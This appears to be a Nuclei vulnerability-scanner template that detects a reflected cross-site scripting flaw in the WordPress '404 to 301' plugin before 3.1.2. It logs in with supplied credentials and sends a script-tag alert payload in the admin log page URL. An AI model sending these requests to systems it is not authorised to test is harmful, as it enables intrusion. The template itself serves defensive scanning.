45 lines
1.2 KiB
YAML
45 lines
1.2 KiB
YAML
|
id: 404-to-301-xss
|
||
|
|
||
|
info:
|
||
|
name: 404 to 301 < 3.1.2 - Reflected Cross-Site Scripting
|
||
|
author: Akincibor
|
||
|
severity: medium
|
||
|
description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/4a310b4f-79fa-4b74-93f8-e4522921abe1
|
||
|
- https://wordpress.org/plugins/404-to-301
|
||
|
tags: wp-plugin,xss,wp,wordpress,authenticated
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-login.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Origin: {{RootURL}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||
|
|
||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||
|
- |
|
||
|
GET /wp-admin/admin.php?page=jj4t3-logs&a"><script>alert(1)</script> HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
cookie-reuse: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '"><script>alert(1)</script>'
|
||
|
- '404 Error Logs'
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|